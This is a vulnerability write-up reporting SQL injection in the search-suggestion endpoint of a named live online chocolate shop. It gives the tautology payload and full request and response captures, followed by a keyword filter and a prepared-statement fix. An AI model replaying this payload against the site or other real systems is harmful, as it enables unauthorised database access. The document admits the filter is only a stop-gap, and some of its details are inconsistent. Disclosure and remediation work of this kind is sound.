Author: Gaddar
Recon Date: 18.02.2024
Vuln: SQL Injection (Blind)
Payload: data' or '1'='1'-- -
Vulnerable File: init.php
Tutorials video: https://www.youtube.com/watch?v=DaBWg1I86PE
Tested on Windows 11 Professional with Burp Suite Community Edition v2023.12.1.5
Website: shop.beyoglucikolata.com.tr
First, a benign request:
POST /ajax HTTP/2
Host: shop.beyoglucikolata.com.tr
Cookie: PHPSESSID=0373ce0394d206913c0bddfbd779e12c
Content-Length: 49
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://shop.beyoglucikolata.com.tr
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://shop.beyoglucikolata.com.tr/search
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=1, i
type=search_suggestion&c_id=0&q=1&t=1708442363774
Response:
HTTP/2 200 OK
X-Powered-By: PHP/7.3.33
X-Powered-By: PleskLin
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Tue, 20 Feb 2024 15:26:10 GMT
Server: LiteSpeed
Alt-Svc: quic=":443"; ma=2592000; v="39,43,46", h3-Q039=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-23=":443"; ma=2592000, h3-24=":443"; ma=2592000
<div class="search_suggestion"><span class="search_suggestion_error">Lütfen en az 3 karakter giriniz.</span></div>
Vulnerable request:
POST /ajax HTTP/2
Host: shop.beyoglucikolata.com.tr
Cookie: PHPSESSID=0373ce0394d206913c0bddfbd779e12c
Content-Length: 65
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://shop.beyoglucikolata.com.tr
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://shop.beyoglucikolata.com.tr/search
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=1, i
type=search_suggestion&c_id=0&q=1' or '1'='1'-- -&t=1708442363774
Vulnerable response:
HTTP/2 200 OK
X-Powered-By: PHP/7.3.33
X-Powered-By: PleskLin
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Tue, 20 Feb 2024 15:26:53 GMT
Server: LiteSpeed
Alt-Svc: quic=":443"; ma=2592000; v="39,43,46", h3-Q039=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-23=":443"; ma=2592000, h3-24=":443"; ma=2592000
<div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-kek-askim-sutlu-cikolata-kapli-marsmelovlu-kakaolu-sandvic-kek-30-gr-x-24-adet-sade-p-6">Beyoğlu Kek Aşkım - Sütlü Çikolata Kaplı Marşmelovlu Kakaolu Sandviç Kek 30 Gr X 24 Adet Sade</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/bitter-cikolata-kaplamali-findik-kremali-gofret-36-gr-x-24-adet-p-7">Bitter Çikolata Kaplamalı Fındık Kremalı Gofret 36 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/findikli-gofret-sutlu-cikolata-ve-findik-parcacik-kaplamali-kremali-gofret-33-gr-x-24-adet-p-8">Fındıklı Gofret - Sütlü Çikolata Ve Fındık Parçacık Kaplamalı Kremalı Gofret 33 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-krem-cikolata-13-findikli-kakaolu-findikli-krema-350-gr-p-9">Beyoğlu Krem Çikolata %13 Fındıklı - Kakaolu Fındıklı Krema 350 Gr</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-fun-sutlu-cikolata-kapli-karamelli-nuga-bar-36-gr-x-24-adet-p-11">Beyoğlu Fun - Sütlü Çikolata Kaplı Karamelli Nuga Bar 36 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-fistik-cikolata-kapli-karamelli-yer-fistikli-nuga-bar-50-gr-x-24-adet-p-12">Beyoğlu Fıstık - Çikolata Kaplı Karamelli Yer Fıstıklı Nuga Bar 50 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-findiklim-findikli-sutlu-cikolata-38-gr-x-24-adet-p-13">Beyoğlu Fındıklım - Fındıklı Sütlü Çikolata 38 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/butun-tane-findikli-sutlu-cikolata-30-gr-x-24-adet-p-14">Bütün Tane Fındıklı Sütlü Çikolata 30 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-cikolata-cocorops-sutlu-cikolata-kapli-hindistan-cevizli-bar-50-gr-x-24-adet-p-15">Beyoğlu Çikolata Cocorops Sütlü Çikolata Kaplı Hindistan Cevizli Bar 50 GR x 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-kek-askim-dark-bitter-cikolata-kapli-marsmelovlu-kakaolu-sandvic-kek-30-gr-x-24-adet-sade-p-16">Beyoğlu Kek Aşkım Dark - Bitter Çikolata Kaplı Marşmelovlu Kakaolu Sandviç Kek 30 Gr X 24 Adet Sade</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-fistiklim-antep-fistikli-sutlu-cikolata-38-gr-x-24-adet-p-17">Beyoğlu Fıstıklım - Antep Fıstıklı Sütlü Çikolata 38 Gr X 24 Adet</a></div><div class="search_suggestion"><a href="https://shop.beyoglucikolata.com.tr/product/beyoglu-cikolatali-gofret-sutlu-cikolata-kaplamali-findik-kremali-gofret-36-gr-x-24-adet-p-18">Beyoğlu Çikolatalı Gofret - Sütlü Çikolata Kaplamalı Fındık Kremalı Gofret 36 GR x 24 Adet</a></div>
How to fix this vulnerability?
Add the following code to init.php (init.php is in the main directory). Note that this is a request filter, not a fix of the query itself: it only stops inputs containing " or ", so it should be treated as a stop-gap until the search query is rewritten with prepared statements.
// Stops the script if a request value contains " or " (case-insensitive).
// Array parameters (e.g. q[]=...) are walked recursively; stripos() on an array would otherwise fail.
function kontrolEt($veri) {
    if (is_array($veri)) {
        foreach ($veri as $v) {
            kontrolEt($v);
        }
        return null;
    }
    if (stripos($veri, " or ") !== false) {
        // Message (Turkish): "The data you entered contains dangerous content. Please contact the administrators."
        die("<center style='margin:20px 0;font-size:22px;'>Girdiğiniz veriler tehlikeli içerikler barındırıyor. Lütfen yetkililerle iletişime geçiniz.</center>");
    } else {
        return null;
    }
}

// Run the check on every GET/POST/COOKIE value, except on the admin route.
// route() and getAfterSlash() are the application's own existing helpers.
if (route(1) != getAfterSlash(ADMIN_URL)) {
    foreach ($_REQUEST as $param => $value) {
        kontrolEt($value);
    }
}
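The real remedy is to stop building the search SQL from the q parameter at all. The handler below is an added example, not the shop's own code: it rewrites the search_suggestion action with a PDO prepared statement and keeps the 3-character minimum seen in the benign response. The table and column names (products, name, slug, category_id) and the $pdo connection are assumptions.

```php
<?php
// Added example (not the site's code). Assumed: a `products` table with
// `name`, `slug`, `category_id` columns, and $pdo created elsewhere as
// new PDO($dsn, $user, $pass, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
//                               PDO::ATTR_EMULATE_PREPARES => false]);

function searchSuggestion(PDO $pdo, string $q, int $categoryId): string
{
    $q = trim($q);
    if (mb_strlen($q) < 3) {
        // Same message the site returns for short terms ("Please enter at least 3 characters.")
        return '<div class="search_suggestion"><span class="search_suggestion_error">'
             . 'Lütfen en az 3 karakter giriniz.</span></div>';
    }

    // Escape LIKE wildcards so the user's term is matched literally (MySQL's
    // default LIKE escape character is the backslash), then bind it as data.
    $pattern = '%' . addcslashes($q, '%_\\') . '%';

    $sql    = 'SELECT name, slug FROM products WHERE name LIKE :pattern';
    $params = [':pattern' => $pattern];
    if ($categoryId > 0) {
        $sql .= ' AND category_id = :cid';
        $params[':cid'] = $categoryId;
    }
    $sql .= ' ORDER BY name LIMIT 12';

    // The SQL text is fixed; the user-controlled values travel as bound parameters
    // and can never change the statement's structure.
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);

    $out = '';
    foreach ($stmt as $row) {
        $url  = 'https://shop.beyoglucikolata.com.tr/product/' . rawurlencode($row['slug']);
        $out .= '<div class="search_suggestion"><a href="'
              . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">'
              . htmlspecialchars($row['name'], ENT_QUOTES, 'UTF-8')
              . '</a></div>';
    }
    return $out;
}

// Wiring for the POST /ajax endpoint (parameter names taken from the captured request).
if (($_POST['type'] ?? '') === 'search_suggestion') {
    echo searchSuggestion($pdo, (string)($_POST['q'] ?? ''), (int)($_POST['c_id'] ?? 0));
}
```

With this in place the kontrolEt() filter becomes defence in depth rather than the only barrier, and the log entry it produces on a blocked request is still worth alerting on.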